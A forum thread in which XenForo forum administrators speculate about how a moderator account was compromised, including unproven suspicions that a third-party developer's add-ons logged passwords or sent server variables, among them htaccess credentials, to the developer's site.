******* logging passwords? Just saw this thread over at TAZ

[Alpha1]

Yes, this is extremely strange. I wonder what they were trying to do with the liveupdate addon.

 

[Sheldon]

Yes, this is extremely strange. I wonder what they were trying to do with the liveupdate addon.

Where exactly does that addon tie into any of this?

 

[Lisa]

Where exactly does that addon tie into any of this?

I commented earlier that while Matt was looking through server logs, that IP showed up a lot with LiveUpdate references.

 

[Alpha1]

It may be worth checking if there is a vulnerability in that. @Chris D

 

[Lisa]

It may be worth checking if there is a vulnerability in that. @Chris D

Doubt there is.

 

[Chris D]

I commented earlier that while Matt was looking through server logs, that IP showed up a lot with LiveUpdate references.

It may be worth checking if there is a vulnerability in that. @Chris D

Doubt there is.

It can be easily explained by the fact that the live update page is polled roughly every 10 seconds for each logged in user, and each tab they have open, in fact.

I would be surprised if there wasn't a lot of live update references generally for any user and also, there's nothing to be vulnerable. It's just JS which sends an Ajax request which returns a success message. It's actually XF's Ajax system itself which leaks the conversation and alert count.

 

[Fred.]

I realized tonight I have an account at *******s, decided to try and change the email/password to something random, apparently they've disabled the ability to change the registered email....great
View attachment 107374

Then the only solution is to mark all his e-mails as spam
If a lot of people do this his reputation will go down further and further.

 

[Lisa]

It can be easily explained by the fact that the live update page is polled roughly every 10 seconds for each logged in user, and each tab they have open, in fact

Dropped you a PC, Chris

 

[Anthony Parsons]

Wow... the drama!

 

[Alpha1]

Still can't fathom how they guessed the mod's password on the first try.

I log in to TAZ multiple times a day, so the attacker could use up 2 trials between each login. They could have been trying for weeks. That's one explanation.
The other explanation is more spooky. I used the same XF password for my development install which had a ******* addon (Advanced Reputation System) on it. The dev install is password protected with a completely different password so it seemed secure enough.

 

[Liam W]

I log in to TAZ multiple times a day, so the attacker could use up 2 trials between each login. They could have been trying for weeks. That's one explanation.
The other explanation is more spooky. I used the same XF password for my development install which had a ******* addon (Advanced Reputation System) on it. The dev install is password protected with a completely different password so it seemed secure enough.

If you had an old ******* add-on that sent the entire server variable, chances are they got the htaccess username and password...

Not saying they would use it though.

Liam

 

[rdn]

The dev install is password protected with a completely different password so it seemed secure enough.

I don't think so.
Quote from @Liam W on TAZ. https://theadminzone.com/threads/do-you-consider-*******-addons-a-security-risk.134246/#post-992215

Their code always used a callback, and they sent the entire $_SERVER array to their site - this includes the your IP, as well as any basic authentication (htaccess) details used to access the AdminCP area (which I'm not sure many people are aware of).

 

[Sheldon]

The lack of a response from @joey_tbf and @rafass states enough for me.

Thanks for the reply guys. Just wanted to see where we stood.

 

[m1ne]

My password at ******* is just a random string of letters, numbers and characters. Completely unique.
However, I have noticed that on May 18th 2015, my account on my forum had been accessed by an IP based in Vietnam. 113.160.6.154 - I do use a LOT of proxies though, so this may not be a breach.
A former admin account had also been accessed by a Vietnamese IP almost a year before as well.

So... it's possible his addons are logging passwords.

 

[Daniel Hood]

So... it's possible his addons are logging passwords.

Well.. that would be just shocking.

 

[SneakyDave]

so the attacker could use up 2 trials between each login. They could have been trying for weeks. That's one explanation.

Lisa said the logs don't show any failed attempts. Maybe you really DID use the same password? That's the only conclusion I can see, unless TAZ has an add-on feeding passwords to an external site, but then you'd think there'd be bigger problems

There isn't a scenerio that I can see in which you have different passwords at different sites, and somebody could gain access without at least one failed attempt

Even if your session was hijacked, I'm not sure if that could be possible over SSL and XenForo.

 

[Jake B.]

Well.. that would be just shocking.

Though, not as shocking as it would be if someone else's add-ons were doing that.

 

[Mike Edge]

Lisa said the logs don't show any failed attempts. Maybe you really DID use the same password? That's the only conclusion I can see.

Yeap, I can see it only as one of two conclusions based on what has been said..

a) used exact password and it was decoded or saved into another table as plaintext when you register.

b) used a nulled add-on from a pirate site and got key logged.

 

[Newt]

So... it's possible his addons are logging passwords

Thanks for suggestion. Let us try next update.

One hour later
Addon updated: Minor bug fixes and perfomance improvements.

 

[Daniel Hood]

Though, not as shocking as it would be if someone else's add-ons were doing that.

Crap. I must have forgotten to use my sarcasm bbcode again